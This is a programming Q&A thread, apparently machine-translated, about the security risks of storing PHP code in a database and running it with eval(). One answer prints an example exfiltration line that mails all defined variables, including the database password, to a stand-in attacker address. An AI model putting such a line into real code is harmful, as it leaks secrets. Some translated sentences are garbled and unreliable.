Is storing PHP code in a database and eval () at runtime unsafe?

Question

Is storing PHP code in a database and eval () at runtime unsafe?

I created a program that stores, retrieves, and eval()s code from a SQLite database.

Before I jumped over for my bad coding methods, let me just see it as theoretical and pretend that I have good reason for this.

All other considerations aside and assuming that user input is not a factor, is there a security risk inherent in storing PHP code in the database and running it using eval() ?

Explanations:

I am not eval()ing user content.
The SQLite DB file is in the same directory and has the same security as the rest of my files.
No comments on performance, caching, etc. I know about all this.

+4

security sql database eval php

Yarin Oct 11 '11 at 23:50

source share

6 answers

Zeta two · Answer 1 · 2011-10-11T23:53:37+0000

eval () itself is not uncovered. This is just bad practice, incomprehensible and open to a number of errors and security issues.

elazar · Answer 2 · 2011-10-12T01:48:28+0000

Even if the user data is not stored in your database, you still provide a way for the code stored in the database to be executed even if you did not place this code. If someone gets access to your database server, they can potentially do something worse than abandon the database by changing the code that it stores, for example, deleting any files that the PHP script has write access to.

Daniel Pereira · Answer 3 · 2011-10-11T23:54:00+0000

Yes. If I can insert something into your database, I could execute it on your server via eval.

Kousik nandy · Answer 4 · 2011-10-12T06:06:51+0000

Are you trying to use the database as a hash table of functions? Thus, you can call a piece of code depending on some key evaluation. The security problem that I see here is that another API may appear in the database, populate it somewhere. If you do not know / do not explicitly do this, a pair of keys, values can be entered in the database. If you used a function hash table instead, someone needs to commit in your code repository to change the function. So now you need to protect the database as well as your code repository.

L̲̳o̲̳̳n̲̳̳g̲̳̳p̲̳o̲̳̳k̲̳̳e̲̳̳ · Answer 5 · 2011-10-13T20:37:16+0000

You allow the database to run any PHP code that it wants, like any user PHP works with. Of course, this is not safe.

Bill karwin · Answer 6 · 2016-07-12T14:43:59+0000

eval() is inherently unsafe. But it is protected only if the code that it evaluates is safe. Thus, we could come up with an example of code that does something bad, suppose there is some way that the code received in your database, and an arrow.

Code stored elsewhere is not part of your project, not code verified, not tracked in git, and not tested on the device. The code is not generally evaluated in terms of security, so there is no security guarantee. In other words, in terms of quality assurance, this is a poor quality plan, since code security is part of the quality of the code.

Anyone who has access to your database can modify the code, and then this code is executed, I guess without any review. The code has no access restrictions; it can reference and even change variables in the application that calls it. So the question is, how has the code in your database changed? Who has access? What is a code verification process? What is a testing process?

In addition to SQL injection, which can illegally modify PHP code in the database, there is also the security of any authentication that you use for users before they can make authorized changes to the code. I assume that your application has some interface for changing the code in the database via the web interface.

You asked for evidence that I think you need an example of code that could do something bad if it were evaluated.

If I can organize something like the following code that will be stored in your database and eval() this code, I can get a lot of information about your application. For instance. your database password, authentication methods, version of the structure you use ... all kinds of things.

 mail(' attacker@example.com ', 'Mwa ha ha', print_r(get_defined_vars(), true));

There are similar functions like get_defined_functions() . Or even return the source code with open(__FILE__) . An attacker can quickly find out where there are other security vulnerabilities in your code.

And then there are various ways that PHP code can get information about your server or make changes to your server. Combine eval() with code that uses exec() , and you can run any command on the server. At least it works under uid, which runs an http server, which I hope is not root.

Is storing PHP code in a database and eval () at runtime unsafe?

More articles: